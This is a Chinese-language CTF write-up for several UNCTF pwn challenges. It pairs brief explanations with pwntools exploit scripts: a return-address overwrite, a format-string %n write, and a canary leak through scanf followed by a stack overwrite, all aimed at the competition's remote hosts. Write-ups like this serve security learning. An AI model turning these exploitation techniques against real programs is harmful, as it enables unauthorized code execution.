2020-11-15 UNCTF部分pwn的wp

第一题:

    直接用pwn里的recv( )就行了

do you like me:

    直接覆盖到ip返回地址就好了

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node2.hackingfor.fun',36806)
#sh=process('./like')
sh.recv()
sh.sendline(p64(0)*3+p64(0x04006CD))
sh.interactive()

do you really know pwn:

    简单格式化字符串漏洞,修改bss段上的一个数据,使得它非零就好了

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./know')
sh=remote('node2.hackingfor.fun',32692)
context.log_level='debug'
sh.recv()
sh.sendline('aaa%11$n'+p64(0x60107c))
sh.recv()
sh.interactive()

pwngirl:

    这一题做了两天, 其实是不晓得scanf的一个考点: 只输入’+’
或者’-'的话,是不会修改地址上储存的值的, 然后我们就可以通过这个输出canary了

’
看ida可以得到, 当第二次选择girlfriend个数时, 输入个数为27时不会重新排序,所以输入选择输入27

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./pwngirl')
sh=remote('node2.hackingfor.fun',39376)
#context.log_level='debug'

sh.recv()
sh.sendline('@')
sh.recv()
sh.sendline('^')
sh.recv()
sh.sendline('a')
sh.recv()
sh.sendline('12')
sh.recv()
for i in range (12):
    if i <10:
        sh.sendline('0')
    else:
        sh.sendline('+')

sh.recvuntil('this is the sort result:')
possible=sh.recvuntil('you can')
possible=possible.split()[:-2]
cnt=12
for i in range(12):
    possible[i]=int(possible[i])
for i in range(12):
    if (possible[11-i] == 0):
        del possible[11-i]
print possible
'''
for i in range(2):
    possible[i]=possible[1]+0x100000000
    possible[i]=possible[i]%0x100000000
'''
if(possible[0]&0x99!=0):
    tmp=possible[0]
    possible[0]=possible[1]
    possible[1]=tmp

for i in range(2):
    print hex(possible[i])

sh.recv()
sh.sendline('0')
sh.recv()
sh.sendline('27')
for i in range(27):
    sh.recvuntil('now change:')
    if i==10:
        sh.sendline(str(possible[0]))
    elif i==11:
        sh.sendline(str(possible[1]))
    elif i==14:
        sh.sendline(str(4197380))
    else:
        sh.sendline('0')

sh.interactive()
``